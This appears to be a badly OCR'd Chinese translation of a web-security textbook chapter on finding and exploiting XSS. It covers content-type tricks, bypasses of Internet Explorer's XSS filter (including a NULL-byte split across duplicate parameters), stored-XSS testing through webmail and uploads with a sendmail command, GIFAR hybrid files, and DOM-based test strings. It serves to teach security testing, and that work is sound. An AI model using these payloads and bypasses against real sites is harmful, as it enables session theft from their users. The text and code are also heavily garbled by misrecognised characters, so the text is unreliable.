下 面 的 JSON 数 据 中 ， 注 释 字 段 被 用 于 注入 所 需 的 等 号 字符 : 


{ "name": "John", "email": "gomad@diet.com", "comment": "=" 
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在 使 用 这 种 技巧 时 ， 唯 一 震 要 注意 的 地 方 是 ， 生 成 的 请 求 将 包含 以 下 消息 头 : 

Content-Type: text/plain 

正常 情况 下 , 根据 生成 请 求 的 具体 方式 ,最初 的 请 求 本 应 包含 一 个 不 同 的 content-Type 消 
县 头 。 如 果 应 用 程序 接受 提供 的 Content-Type 消 息 头 并 正 稼 处 理 消息 主体 ， 则 在 设计 有 效 的 
XSS 攻 击 时 就 可 以 使 用 这 种 技巧 。 如 果 由 于 content-Type 消 息 头 已 修改 ， 应 用 程序 无 法 正常 处 
理 请 求 ， 则 可 能 没有 办 法 跨 域 传送 适当 的 请 求 来 触发 类 似 于 XSS 的 行为 。 



































提示 “如果 在 包含 非 标准 内 容 的 请 求 中 确定 了 类 似 于 XSS 的 行为 ， 首 先 应 该 快速 确 


J 定 , 在 将 content-Type 消 息 头 更 改 为 text/plain 后 ,这 种 行为 是 否 仍 然 存 在 。 如 果 
这 种 行为 不 再 存在 ， 则 你 不 必 付 出 任何 其 他 努力 来 尝试 设计 有 效 的 XSS 攻 击 。 





v [1 XMLI| LUUDU Javascript 

竺 尝试 利用 非 标准 内 容 中 的 类 似 于 XSS 的 行为 时 , 你 需要 元 服 的 第 二 个 障碍 是 找到 一 种 操纵 
啊 应 的 方法 ,使 其 在 由 浏览 带 和 直接 处 理 时 能 够 执行 你 的 脚本 。 如 果 啊 应 中 包含 错误 的 
content-Type 消 息 头 ， 或 根本 不 包含 content-Type 消 息 头 ， 或 者 如 末 输 入 在 啊 应 主体 的 开始 
部 分 就 已 反射 ， 则 可 以 轻松 克服 这 种 障碍 。 

但 是 ， 啊 应 通常 都 包含 准确 描述 应 用 程序 返回 的 数据 类 型 的 content-Type 消 奶 涉 。 此 外 ， 
你 的 输入 大 多 是 在 响应 的 中 间 部 分 反射 。 同时, 在 此 位 置 之 前 和 之 后 的 啊 应 内 容 包含 的 数据 村 循 
指定 内 容 类 型 的 相关 规范 。 不 同 浏览 关 解 析 内 容 的 方式 各 不 相同 。 一 些 浏览 硕 完 全 信任 
Content-Type 消 息 头 ,一 些 浏览 需 则 会 检查 内 容 本 身 ， 并 在 具体 的 类 型 有 所 不 同时 禾 盖 指定 的 
类 型 。 但 是 ， 在 这 种 情况 下 ， 无 论 浏 览 硕 如 何 处 理 内 容 ， 它 都 不 大 可 能 将 啊 应 作为 HTML 处理。 

如 宁可 以 构建 能 够 成 功 执行 脚本 的 啊 应 ， 这 往往 需要 利用 所 注入 的 内 容 类 型 的 特定 语法 特 
性 。 垃 好 ， 对 于 XML 而 言 ， 你 可 以 使 用 XML 标记 定义 一 个 映射 为 XHTML 的 新 命名 空间 ， 并 使 浏 
览 需 将 该 命名 空间 解析 为 HIML， 从 而 达到 执行 脚本 的 目的 。 例 如 ， 在 Firefox 处 理 以 下 啊 应 时 ， 
注入 的 脚本 将 得 以 执行 : 

HTTP/1.1 200 Ok 


Content-Type: text/xml 
Content-Length: 1098 






































<xml> 


<data> 


<a mlns:a='http://www.w3.o0rg/1999/xhtml'> 
<a:body onload='alert(1)})'/></a> 


wn 

</xm]l> 

如 上 所 述 , 如 采 啊 应 由 浏览 硕 直 接 处 理 , 而 不 是 由 通常 处 理 啊 应 的 原始 应 用 程序 组 件 处 理 时 ， 
此 攻击 将 取得 成 功 。 
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在 利用 几乎 任何 反射 型 XSS 漏 洞 时 总 是 会 遇 到 一 个 障碍 ， 即 各 种 浏览 需 功 能 都 针对 XSS 攻 击 
为 用 户 提 供 了 保护 。Internet Explorer 浏 览 大 默认 包含 一 个 XSS 过 滤 锅 ， 其 他 一 些 浏览 可 也 通过 插 
件 的 形式 提供 类 似 的 功能 。 这些 过 滤 兹 的 工作 方式 基本 类 似 : 它们 被 动 监视 请 求 和 啊 应 ,并 使 用 
各 种 规则 来 确定 正在 进行 的 潜在 XSS 攻 击 , 一 旦 确定 潜在 攻击 ， 就 修改 啊 应 的 某 些 部 分 来 阻止 这 
些 攻击 。 

如 前 所 述 ， 如 有 果 可 以 通过 任何 广泛 使 用 的 浏览 絮 来 利用 XSS 条 件 ， 我 们 就 应 将 这 些 条 件 视 为 
漏洞 。 而 且 ， 某 些 浏 览 硕 提供 XSS 过 滤 硕 并 不 意味 看 不 需要 修复 XSS 漏 洞 。 在 某 些 现实 情况 下 ， 
攻击 者 可 能 恰恰 再 要 通过 包含 XSS 过 滤 仙 的 浏览 帝 来 利用 某 个 漏洞 。 此 外 ， 用 于 避 开 XSS 过 沽 天 
的 方法 本 对 也 值得 我 们 关注 。 在 某 些 情况 下 , 我 们 甚至 可 以 利用 这 些 方法 来 实施 通过 别 的 方法 无 
法 实施 的 其 他 攻击 。 

在 这 一 节 中 ， 我 们 将 介绍 Internet Explorer 的 XSS 过 滤 需 。 目 前 ， 它 是 最 成 熟 及 应 用 最 广泛 的 

IE XSS 过 小谷 的 核心 功能 如 下 。 

口 检查 跨 域 请 求 中 的 每 一 个 参数 值 ， 以 确定 注入 JavaScript 的 可 能 尝试 。 它 会 根据 一 个 常见 

攻击 字符 串 的 基于 正则 表达 式 的 黑 名 单 来 检查 这 些 值 ， 从 而 完成 这 一 任务 。 

口 如 有 果 发 现 潜在 恶意 的 参数 伸 ， 则 检查 啊 应 ， 看 其 中 是 否 包 含 相同 的 值 。 

口 如 果 啊 应 中 出 现 该 值 , 则 会 对 啊 应 进行 滔 化 ,以 防止 执行 任何 脚本 ,例如 , 它 会 将 <script> 

修改 为 <sc#ipt>。 

关于 耻 XSS 过 滤 希 ， 需 要 指出 的 第 一 个 问题 是 : 大 体 而 言 ， 它 能 够 有 效 阻 止 利用 XSS 漏 洞 的 
标准 攻击 ， 从 而 为 任何 尝试 实施 这 类 攻击 的 攻击 者 设置 了 很 大 的 障碍 。 这 意味 者 , 需要 通过 某 些 
特定 的 方法 才能 避 开 这 种 过 滤 需 。 此 外 , 还 可 以 利用 这 种 过 滤 右 的 工作 机 制 来 实施 通过 别 的 方法 
无 法 实施 的 其 他 攻击 。 

首先 ， 利 用 这 种 过 小 硕 的 核心 功能 ， 我 们 可 以 找到 一 些 避 开 该 过 滤 硕 的 方法 。 

口 该 过 滤 需 仅 检 查 参 数 信 ， 而 不 检查 参数 名 称 。 一 些 应 用 程序 吻 于 受到 针对 参数 名 称 的 攻 

击 ， 如 在 啊 应 中 回 显 请 求 的 整个 URL 或 整个 查询 字符 串 。 该 过 滤 融 无 法 阻止 这 类 攻击 。 

D 该 过 滤器 单独 检查 每 个 参数 值 。 但 是 ， 如 果 在 同一 个 响应 中 反射 多 个 参数 ， 就 可 以 将 攻 
击 从 一 个 参数 传递 到 为 一 个 参数 ( 如 用 于 突破 长 度 限制 的 技巧 中 所 述 )。 如 果 可 以 将 XSS 
有 效 载 傈 分 割 成 几 块 ， 则 其 中 任何 一 块 都 不 会 与 受阻 止 的 表达 式 黑 名 单 相 匹 配 ， 这 样 ， 
过 滤 逢 将 无 法 阻止 攻击 。 

口 由 于 性 能 原因 ， 该 过 滤 需 仅 检 查 览 域 请 求 。 因 此 ， 如 采 攻 击 者 能 够 使 用 户 同 XSS URL 提 
出 “本 地 ”请 求 ， 过 滤 副 将 无 法 阻止 这 种 攻击 。 通 常 ， 如 采 应 用 程序 包含 任何 行为 ， 允 
许 攻击 者 在 由 其 他 用 户 查 看 的 页 面 中 注入 任意 链接 ， 这 种 攻击 即 成 为 可 能 (虽然 这 本 母 
也 属于 反 冉 型 攻击 ， 但 XSS 过 小 右 仪 尝试 阻止 注入 的 脚本 ， 而 不 是 注入 的 链接 )。 在 这 种 
情况 下 ， 攻 击 者 需要 完成 两 个 步 又 : 在 用 户 的 页 面 中 注入 恶意 链接 ; 用 户 单 击 链接 并 收 
到 XSS 有 效 载 傈 。 








































































































352 第 12 章 攻击 其 他 用 户 


其 次 ， 在 某 些 情况 下 ， 可 以 利用 浏览 句 和 服务 需 的 特殊 行为 来 避 开 XSS 过 滤 吉 。 
口 如 你 所 见 , 浏览 絮 在 处 理 HTML 时 接受 各 种 类 型 的 异常 字符 和 语法 。 例 如, I 下 本 对 就 接受 
NULL 字 节 。 有 了 时， 攻击 者 可 以 利用 正 的 这 种 古怪 行为 来 避 开 它 的 XSS 过 滤 右 。 
口 如 第 10 章 所 述 ， 在 请 求 包 含 多 个 同名 参数 时 ， 应 用 程序 服务 需 的 行为 各 不 相同 。 在 某 些 
情况 下 ， 它 们 会 串联 收 到 的 所 有 值 。 例 如 ， 在 ASPNET 中 ， 如 果 查 询 字 符 串 包含: 
pl=foo&pl=bar 
传递 给 应 用 程序 的 参数 p1 的 值 为 : 
D1L=foo,bar 
与 之 相反 ， 即 使 参数 的 名 称 相 同 ， 但 IE XSS 过 滤器 仍然 会 单独 处 理 每 个 参数 。 这 种 
行为 差异 使 得 攻击 者 能 够 轻松 在 几 个 相同 名 称 的 “不 同 ” 请 求 参数 之 间 传 递 XSS 有 效 载 集 ， 
从 而 避 开 针对 每 个 单独 的 值 的 黑 名 单 过 滤 〈 因 为 服务 需 已 将 它们 串联 起 来 )。 
当前 ， 以 下 XSS 攻 击 可 成 功 避 开 IE XSS 过 滤 需 : 


http://mdsec.net/error/5/Error.ashx?message=<scr%00ipt%20&message=> alert('xss')</script> 

















再 次 , 通过 利用 该 过 滤 带 净化 应 用 程序 啊 应 中 的 脚本 代码 的 方式 , 可 以 实施 通过 其 他 方法 无 
法 实施 的 攻击 。 之 所 以 会 出 现 这 种 情况 ， 主 要 是 因为 该 过 滤 胡 以 被 动 方式 运行 ， 仅 寻找 类 似 脚 本 
的 输入 与 类 似 脚本 的 输出 之 间 的 关联 。 它 无 法 对 应 用 程序 进行 交互 性 探查 ,以 确定 给 定 输入 是 否 
与 给 定 输出 相关 联 。 因 此 , 攻击 者 可 以 利用 该 过 沽 天 净化 在 啊 应 中 出 现 的 应 用 程序 目 身 的 脚本 代 
人 码 。 如 果 攻 击 者 在 请 求 参 数值 中 包含 一 部 分 现 有 脚本 , IE XSS 过 滤 融 在 请 求 和 啊 应 中 发 现 相 同 的 
脚本 代码 ， 它 就 会 修改 啊 应 中 的 脚本 ， 以 阻止 该 脚本 执行 。 

事实 证 明 , 在 某 些 情况 下 , 净化 现 有 脚本 将 改变 包含 用 户 输入 反射 的 啊 应 的 后 续 部 分 的 语法 
情境 。 这 种 情境 的 改变 意味 着 应 用 程序 自身 对 反射 型 输入 的 过 涯 不 充分 。 因 此 , 攻击 者 可 以 利用 
用 户 输 入 反射 来 实施 XSS 攻 击 〈 如 朱 了 正 XSS 过 沽 囊 没 有 修改 啊 应 ， 这 种 攻击 将 无 法 成 功 ) 但 是 ， 
能 够 实施 这 类 攻击 的 情形 通常 与 不 常用 的 功能 或 早期 版 本 的 下 XSS 过 泪 带 中 披露 的 缺陷 〈 已 修 
复 ) 有 关 。 

更 重要 的 是 , 由 于 攻击 者 可 以 选择 性 地 净化 应 用 程序 日 映 的 脚本 代码 ， 因此， 他们 可 以 利用 
这 种 “能 力 ”， 通 过 破坏 应 用 程序 安全 相关 的 控制 机 制 来 实施 全 然 不 同 的 攻击 。 一 个 凋 见 的 示例 
是 删除 防御 性 的 framebusting 代 码 〈 请 参阅 第 13 曹 了解 详 细 信 息 ) 但 其 他 大 量 示例 主要 与 在 客户 
半 执 行 关键 的 安全 防御 任务 的 应 用 程序 专用 代码 有 关 。 
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确定 保存 型 XSS 漏 洞 的 过 程 与 前 面 描 述 的 确定 反射 型 XSS 漏 洞 的 过 程 有 很 多 相似 之 处 ， 都 包 
括 在 应 用 程序 的 每 一 个 进入 点 提交 一 个 特殊 字符 串 。 但是, 这 两 个 过 程 之 间 也 存在 一 些 重要 的 区 
别 。 在 进行 测试 时 ， 必 须 记 住 这 些 区 别 ， 以 确定 尽 可 能 多 的 漏洞 。 
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渗透 测试 步 又 


(1) 向 应 用 程序 中 的 每 一 个 可 能 的 位 置 提交 一 个 特殊 的 字符 串 后 ， 必 须 反复 检查 应 用 程序 











的 全 部 内 容 与 功能 ,确定 这 个 字符 串 在 浏 唤 带 中 显示 的 任何 情况 。 在 茶 个 位 置 (例如 , 个 人 信 
县 页 面 的 姓名 字段 输入 用 户 控制 的 数据 ,这 个 数据 可 能 会 在 应 用 程序 的 许多 不 同位 置 显示 ( 例 
如 ,用 户主 页 上 、 注 册 用 户 列 表 中 、 任 务 等 工作 流程 项 目 中 、 其 他 用 户 的 联系 列表 中 、 用 户 提 
区 的 消息 或 问题 中 、 应 用 程序 日 志 中 等 ) 应 用 程序 可 能 对 每 个 出 现 的 字符 串 实 施 了 不 同 的 保 
护 性 过 滤 ， 因 此 需要 对 它们 进行 单独 分 析 。 

(2) 如 有 可 能 , 应 检查 管理 员 能 够 访问 的 所 有 应 用 程序 区 域 , 确定 其 中 是 否 存在 任何 可 被 非 
管理 用 户 控 制 的 数据 。 例 如 ， 应 用 程序 一 般 允 许 管 理 员 在 浏览 带 中 检查 日 志文 件 。 这 种 类 型 的 
功能 极 有 可 能 包含 XSS 漏 洞 ， 攻 击 者 通过 生成 含有 恶意 HIMEL 的 日 志 记 录 即 可 对 其 加 以 利用 。 

(3) 在 向 应 用 程序 中 的 每 个 位 置 提 交 一 个 测试 字符 串 时 ， 并 不 总 是 把 它 作 为 每 个 页 面 的 每 
一 个 参数 这 样 人 简单 。 在 保存 被 提交 的 数据 之 前 ， 许 多 应 用 程序 功能 需要 经 历 几 个 阶段 的 操作 。 
例如 ,注册 新 用 户 、 处 理 购物 订单 、 转 账 等 操作 往往 知 要 按 预 定 的 顺序 提交 几 个 不 同 的 请 求 。 
为 避免 遗漏 任何 漏洞 ， 必 须 确保 每 次 测试 彻底 完成 。 

(4) 在 探查 反射 型 XSS 漏 洞 时 ， 应 该 注意 可 控 的 受害 者 请 求 的 每 一 个 方面 。 包 括 请 求 的 所 
有 参数 和 每 一 个 HTTP 消 息 头 。 在 探查 保存 型 XSS 漏 洞 时 ， 还 应 该 分 析 应 用 程序 用 于 接收 并 处 
理 可 控 输 入 的 任何 市 外 通道 。 任 何 这 类 通道 都 是 引入 保存 型 XSS 攻 击 的 适当 攻击 回 量 。 同 时 ， 
审查 在 应 用 程序 解析 过 程 中 得 到 的 结果 ( 请 参阅 第 4 章 了 解 相 关内 容 ) 确定 每 一 个 可 能 的 受 攻 
击 面 。 

(5) 如 末 应 用 程序 允许 文件 上 传 与 下 载 ， 应 始终 探查 这 种 功能 是 否 易 于 受到 保存 型 XSS 攻 
击 。 我 们 将 在 本 章 后 面部 分 讨论 测试 这 类 功能 的 详细 技巧 。 

(6) 充分 发 挥 想 象 ， 确 定 控 制 的 数据 是 否 可 通过 任何 其 他 方法 保存 在 应 用 程序 中 并 显示 给 
其 他 用 户 。 例如， 如 来 应 用 程序 的 搜索 功能 显示 沼 用 的 搜索 项 列表 , 就 可 以 通过 多 次 搜索 这 个 
列表 ， 引 入 保存 型 XSS 有 效 载 何 ， 即 使 主 搜索 功能 本 里 安全 地 处理 输入 。 













































































确定 用 户 控制 的 数据 被 应 用 程序 保存 并 随后 在 浏览 问 中 显示 的 每 一 种 情况 后 , 应 当 遵 循 与 前 
面 描述 的 探查 湾 在 的 反射 型 XSS 漏 洞 时 相同 的 过 程 。 也 就 是 说 ， 决 定 需要 提交 哪些 输入 ， 以 在 周 
围 的 HTML 中 散人 入 有 效 的 JavaScript， 人 然后 尝试 避 开 干扰 攻击 有 效 载 何 执 行 的 过 小。 








提示 “在 探查 反射 型 XSS 漏 洞 时 ， 每 次 测试 一 个 参数 ， 并 检查 每 个 响应 中 是 否 出 现 输 
Y 入 ， 就 可 以 轻易 确定 哪些 请 求 参 数 易于 受到 攻击 。 但 是 ， 在 探查 保存 型 XSS 汤 洞 时 ， 
要 确定 这 一 点 并 不 容易 。 如 果 在 每 个 页 面 的 每 一 个 参数 提交 相同 的 测试 字符 串 ， 那 么 


你 可 能 会 发 现 ， 这 个 字符 串 在 应 用 程序 的 许多 位 置 重复 出 现 ， 因 而 无 法 准确 确定 每 个 
出 现 的 字符 事由 哪个 参数 负责 。 为 避免 出 现 这 个 问题 ， 在 探查 保存 型 XSS 时 ， 可 以 为 
每 个 参数 提交 一 个 不 同 的 测试 字符 事 ， 例 如， 把 测试 字符 囊 与 它 提交 到 其 中 的 字段 名 
称 连 接 起 来 。 





354 第 12 章 攻击 其 他 用 户 








在 测试 保存 型 XSS 漏 洞 时 ， 我 们 还 可 以 采用 一 些 特殊 的 技巧 。 在 下 面 几 和 中 ， 我 们 将 详细 介 
绍 这 些 技巧 。 

1. 在 Web 邮 件 应 用 程序 中 测试 XSS 

如 前 所 述 , 由 于 Web 邮 件 应 用 程序 将 直接 从 第 三 方 收 到 的 内 容 包 含 在 向 用 户 显 示 的 应 用 程序 
页 面 中 ， 因此， 这 种 程序 本 身 就 存在 着 保存 型 XSS 攻 击 风险 。 要 测试 这 种 功能 ， 应 该 在 该 应 用 程 
序 上 创建 自己 的 电子 邮件 帐户， 并 通过 电子 邮件 问 自 己 实施 大 量 XSS 攻 击 , 然后 在 该 应 用 程序 中 
查看 每 封 邮 件 ， 确 定 是否 有 任何 攻击 取得 成 功 。 

为 彻底 完成 这 一 任务 ,你 需要 通过 电子 邮件 发 送 各 种 反常 的 HTML 内 容 ( 如 我 们 在 测试 避 开 
输入 过 滤 的 方法 时 所 述 )。 如 果 仅 限于 使 用 标准 电子 邮件 客户 端 ， 你 可 能 会 发 现 ， 无 法 完全 控制 
原始 的 邮件 内 容 ， 或 者 邮件 客户 端 可 能 会 奖 化 或 “清除 ”你 有 意 设 计 的 畸形 语法 。 

在 这 种 情况 下 ,最 好 是 采用 其 他 方法 来 生成 电子 邮件 ,以 便于 直接 控制 邮件 的 内 容 。 一 种 方 
法 是 使 用 UNIX sendmail1 命 令 。 首 先 ， 需 要 使 用 应 当 用 于 回 外 发 送 电子 邮件 的 邮件 服务 堪 的 详 
细 信 息 配 置 电脑 ; 然后 , 可 以 在 文本 编辑 需 中 创建 原始 的 电子 邮件 , 并 使 用 以 下 命令 发 送 该 邮件 : 

sendmail] -t test@example.org < email.txt 

以 下 为 原始 电子 邮件 文件 的 一 个 示例 。 在 消息 主体 中 测试 各 种 XSS 有 效 载 何 和 避 开 过 滤 的 机 
制 时 ， 也 可 以 尝试 指定 不 同 的 content-Type 和 charset: 


MIME-Version: 1.0 
FIrom: test@example.org 









































Content-Type: text/html; charset=us-ascili 
Content-Transfer-Encoding: 7bit 
Subject: XSS test 


<html> 
<body> 
<img src= “onerror=alert (1)> 
</body> 
</html> 


2. 在 上 传 文件 中 测试 XSS 

如 果 应 用 程序 允许 用 户 上 传 可 被 其 他 用 户 下 载 并 查看 的 文件 ， 就 会 出 现 保存 型 XSS 漏 洞 ; 然 
而 ,这 种 漏洞 常常 被 人 们 忽略。 如 今 的 应 用 程序 通常 都 提供 文件 上 传 功能 ， 除 传统 的 用 于 文件 共 
享 的 工作 流 功 能 外 ， 文 件 还 可 以 通过 电子 邮件 附件 的 形式 传送 给 Web 邮 件 用 户 。 图 像 文件 则 可 以 
附加 到 博客 文 草 中 ， 并 且 可 以 用 作 定 制 的 头像 或 通过 相册 共享 。 

应 用 程序 是 否 易 于 受到 上 传 文件 的 攻击 ， 取 决 于 许多 影响 因素 : 

口 在 文件 上 传 过 程 中 ， 应 用 程序 可 能 会 限制 可 以 上 传 的 文件 的 扩展 名 。 

口 在 文件 上 传 过 程 中 ,应 用 程序 可 能 会 检查 文件 内 容 , 以 确认 其 是 否 为 所 需 的 格式 ,如 JPEG。 

口 在 文件 下 载 过 程 中 , 应 用 程序 可 能 会 返回 content-Type 消 息 头 , 以 指定 文件 所 包含 的 内 


容 的 类 型 ， 如 image/jpeg。 





























12.3 ”查找 并 利用 XSS 漏洞 355 


口 在 文件 下 载 过 程 中 , 应 用 程序 可 能 会 返回 content-Disposition 消 息 头 , 以 指定 浏览 需 
应 将 文件 保存 到 磁盘 上 。 否 则 ， 对 于 相关 的 内 容 类 型 ， 应 用 程序 会 处 理 并 在 用 户 的 浏 贤 
需 中 显示 文件 。 
在 测试 文件 上 传 功能 时 ， 首先 你 应 该 尝试 上 传 一 个 包含 概念 验证 脚本 的 人 简单 HTML 文 件 。 如 
采 该 文件 被 接 受 ， 则 尝试 以 正常 方式 下 载 该 文件 。 如 采 应 用 程序 按 原 样 返 回 最 初 的 文件 ， 并且 你 
的 脚本 得 以 执行 ， 则 应 用 程序 肯定 易于 受到 攻击 。 
如 采 应 用 程序 阻止 上 传 的 文件 ， 则 尝试 使 用 各 种 文件 扩展 名 ， 包 括 .txt 和 .jpg。 如 果 在 你 使 用 
其 他 扩展 名 时 ， 应 用 程序 接受 包含 HTML 的 文件 , 则 应 用 程序 可 能 仍然 易于 受到 攻击 ， 具 体 取决 
于 其 在 下 载 过 程 中 如 何 传送 文件 。Web 邮 件 应 用 程序 通 稍 易于 受到 这 类 攻击 。 攻 击 者 可 以 发 送 包 
含 诱惑 性 图 像 附 件 的 电子 邮件 ， 如 采用 户 查 看 该 附件 ， 他 们 的 会 话 将 被 攻破 。 
即使 应 用 程序 返回 Content-Type 消 息 头 ， 指 定 下 载 文件 应 为 图 像 ， 但 是 ， 如 有 果 文 件 实 际 包 
含 的 是 HTML 内 容 ， 一 些 浏览 硕 仍 然 会 将 该 文件 作为 HTML 处 理 。 例 如 : 
HTTP/1.1 200 OK 


Content-Length: 25 
Content-Type: image/ijpeg 



































<script>alert (1)</script> 

旧版 的 Internet Explorer 就 存在 这 种 缺陷 。 如 果 用 户 直 接 请 求 一 个 JPEG 文 件 ( 并非 通过 租 入 式 
<img> 标 签 ), 那么 在 收 到 上 述 啊 应 时 ， 正 会 将 该 文件 的 内 容 当 做 HTML 处 理 。 虽 然 这 种 缺陷 已 经 
得 到 修复 ， 但 将 来 在 其 他 浏览 亏 中 也 可 能 会 出 现 此 类 缺陷 。 

eUUU000 

通常 ， 为 防范 上 述 攻击 ,应 用 程序 会 对 上 传 文件 的 内 容 执行 某 种 确认 ， 以 确保 其 确实 包含 所 
需 格式 的 数据 ， 如 图 像 。 但 是 ,使 用 “混合 文件 ”( 在 一 个 文件 中 组 合 两 种 不 同 的 格式 ) 仍然 可 
以 对 这 些 应 用 程序 实施 攻击 。 

Billy Rios 设 计 的 GIFAR 文 件 就 是 一 种 常见 的 混合 文件 。GIFAR 文 件 包含 GIF 图 像 格 式 和 JAR 
(Java 档 案 ) 格式 的 数据 ， 并 且 是 这 两 种 格式 的 有 效 实 例 。 这 是 因为 ， 与 GIF 格 式 相关 的 文件 元 数 
据 位 于 文件 的 开始 部 分 ， 与 JAR 格 式 相关 的 元 数据 则 位 于 文件 的 结尾 部 分 。 因 此 ， 如 果 应 用 程序 
人 允许 包含 GIF 数 据 的 文件 ， 那 么 ， 在 确认 上 传 文件 的 内 容 时 ,该 应 用 程序 也 会 接受 GIFAR 文 件 。 

通常 ， 使 用 GIFAR 文 件 实施 的 上 传 文件 攻击 由 以 下 步骤 组 成 。 

口 攻击 者 发 现 由 一 名 用 户 上 传 的 GIF 文 件 可 由 其 他 用 户 下 载 ( 如 社交 网 络 应 用 程序 中 的 用 户 

头像 ) 的 应 用 程序 功能 。 

口 攻击 者 构建 一 个 GIFAR 文 件 , 在 其 中 包含 一 段 Java 代 码 ， 用 于 支持 任何 执行 该 代码 的 用 户 





























的 会 话 。 
口 攻击 者 将 该 文件 作为 他 的 头像 上 传 。 因 为 其 中 包含 有 效 的 GIF 图 像 ， 应 用 程序 将 接受 该 
图 像 。 





口 攻击 者 确定 可 利用 上 传 的 文件 对 其 实施 攻击 的 适当 外 部 网 站 。 该 网 站 可 能 为 攻击 者 目 己 
的 网 站 ， 或 允许 用 户 创建 任意 HIML ( 如 博客 ) 的 第 三 方 站 点 。 
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D 在 该 外 部 网 站 上 ， 攻 击 者 使 用 <applet> 和 <object> 标 签 从 上 述 社交 网 络 站 点 以 Java 
applet 的 形式 上 传 GIFAR 文 件 。 

口 如 果 用 户 访问 该 外 部 站 点 ， 攻 击 者 的 Java applet 将 在 其 浏览 器 中 执行 。 与 包含 正常 脚本 的 
文件 不 同 ， 在 遇 到 Java applet 时 ， 同 源 案 略 的 执行 方式 会 有 所 不 同 。Java applet 将 被 视 为 
属于 加 载 它 的 域 ， 而 不 是 调用 它 的 域 。 因 此 ， 攻 击 者 的 applet 将 在 社交 网 络 应 用 程序 的 域 
中 执行 。 如 有 果 受 害 用 户 在 受到 攻击 时 已 登录 该 社交 网 络 应 用 程序 ， 或 者 最 近 曾 登录 该 应 
用 程序 并 选中 了 “保持 登录 状态 ”( stay logged in ) 选项 ， 则 攻击 者 的 applet 将 完全 控制 受 
害 用 户 的 会 话 ， 从 而 侵入 该 用 户 。 

当 表 版 本 的 Java 浏 览 絮 插件 通过 确认 所 加 载 的 JAR 文 件 是 否 包 含混 合 内 容 ， 从 而 阻止 了 这 种 
使 用 GIFAR 文 件 的 特殊 攻击 。 但 是 , 使 用 混合 文件 隐藏 可 执行 文件 的 原理 仍然 适用 。 鉴 于 当前 所 
使 用 的 客户 端 可 执行 代码 格式 的 范围 不 断 扩大 , 攻击 者 或 许可 以 以 其 他 格式 , 或 在 将 来 通过 其 他 
方式 实施 类 似 的 攻击 。 

ejUUAaxddUUUUUUUXSS 

一 些 应 用 程序 使 用 Ajax 来 检索 和 呈现 在 片段 标识 符 之 后 指定 的 URL。 例如, 应 用 程序 的 页 面 
中 可 能 包含 以 下 链接 : 

http://wahh-app.com/#profile 

当 用 户 单 击 此 链接 时 , 客户 端 脚本 将 处 理 单 击 事件 , 使 用 Ajax 来 检索 在 片段 标识 符 之 后 显示 
的 文件 ， 并 在 现 有 页 面 中 的 <div> 元 素 的 innerHtml 中 设置 响应。 这 样 可 提供 无 缝 的 用 户 体验 ， 
因为 单 击 用 户 界 面 中 的 选项 卡 将 更 新 所 显示 的 内 容 ， 而 无 顷 重新 加 载 整个 页 面 。 

在 这 种 情况 下 ， 如 末 应 用 程序 还 包含 其 他 允许 上 传 和 下 载 图 像 文件 ( 如 用 户头 像 ) 的 功能 ， 
你 就 可 以 上 传 一 个 包含 铝 入 式 HTML 标 记 的 有 效 图 像 文件 ， 并 构建 以 下 URL, 使 客户 端 代码 提取 
该 图 像 并 将 其 作为 HTML 显 示 : 

http://wahh-app.com/#profiles/images/15234917624.jpg 

HTML 可 以 舱 入 到 有 效 图 像 文 件 的 各 种 位 置 , 包括 图 像 的 注释 部 分 ,一 些 浏 览 帮 , 包括 Firefox 
和 Safari?， 朱 于 将 图 像 文件 以 HTML 格 式 显 示 。 图 像 的 二 进 制 部 分 将 显示 为 乱码 ， 而 任何 朋 入 的 
HTMIL 将 正常 显示 。 



























































提示 假设 潜在 的 受害 者 使 用 的 是 兼容 HTML5 的 浏览 器 ， 如 果 所 请 求 的 域 许可 ， 该 浏 
避 | 览 器 可 用 于 跨 域 传送 Ajax 请 示 。 在 这 种 情况 下 ， 另 一 种 可 能 的 攻击 方法 ， 是 在 片段 标 
识 符 后 面 放 置 一 个 绝对 URL， 指 定 一 个 位 于 可 与 目标 域 进 行 Ajax 交互 的 服务 器 上 的 、 
完全 由 攻击 者 控制 的 外 部 HTML 文件 。 如 果 客 户 端 脚本 不 确认 所 请 示 的 URL 是 否 在 同 


一 个 域 上 ， 客 户 端 远程 文件 包含 攻击 将 取得 成 功 。 
由 于 旧版 HTML 并 不 需要 对 URL 的 域 进 行 此 类 确认 ， 因 此 ，HTML5 中 对 域 确认 所 
做 的 更 改 可 能 会 给 此 前 安全 的 应 用 程序 造成 可 利用 的 漏洞 。 
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12.3.3 ”查找 并 利用 基于 DOM 的 XSS 漏 洞 


使 用 以 下 方法 无 法 确定 基于 DOM 的 XSS 漏 洞 : 提交 一 个 特殊 的 字符 串 作为 每 个 参数 , 然后 监 
控 啊 应 中 是 否 出 现 该 字符 串 。 

确定 基于 DOM 的 XSS 汤 洞 的 基本 方法 是 ， 用 浏览 器 手动 浏览 应 用 程序 ， 并 修改 每 一 个 URL 
参数 ， 在 其 中 插入 一 个 标准 测试 字符 串 ， 例 如 : 

“<script>alert (1)</script> 


"-alert(1l)// 
一刀 Lert 1) 一 ， 


通过 在 浏览 器 中 显示 每 一 个 返回 的 页 面 , 可 以 执行 所 有 客户 端 脚本 , 并 在 必要 时 引用 经 过 修 
改 的 URL 参 数 。 只 要 包含 cookie 的 对 话 框 出 现 ， 就 表示 发 现 了 一 个 漏洞 (可 能 为 基于 DOM 的 或 其 
他 类 型 的 XSS 漏 洞 )。 使 用 本 喘 提 供 JavaScript 解 释 需 的 工具 甚至 可 以 上 自动 完成 这 个 过 程 。 

然而 ,这 种 基本 的 方法 并 不 能 确定 所 有 基于 DOM 的 XSS 漏 洞 。 如 上 文 所 述 , 在 HTML 文档 中 
注入 有 效 JavaScript 所 需 的 准确 语法 , 取决 于 用 户 可 控制 的 字符 串 插 入 点 前 后 已 经 存在 的 语法 。 这 
时 ,可 能 需要 终止 被 单 引 号 或 双 引 号 引用 的 字符 串 , 或 者 结束 特定 的 标签 。 有 时 可 能 需要 捅 入 新 
标签 ， 但 有 时 并 不 需要 。 客 户 端 应 用 程序 代码 可 能 会 尝试 确认 通过 DOM 获 得 的 数据 ， 但 它 仍然 
易于 受到 攻击 。 

即使 应 用 程序 可 能 易于 受到 精心 设计 的 攻击 , 但 如 果 搬 人 标准 测试 字符 串 仍 不 能 得 到 有 效 的 
语法 , 那么 租 入 式 JavaScript 将 不 会 执行 , 因此 也 不 会 有 对 话 框 出 现 。 由 于 无 法 在 每 个 参数 中 提交 
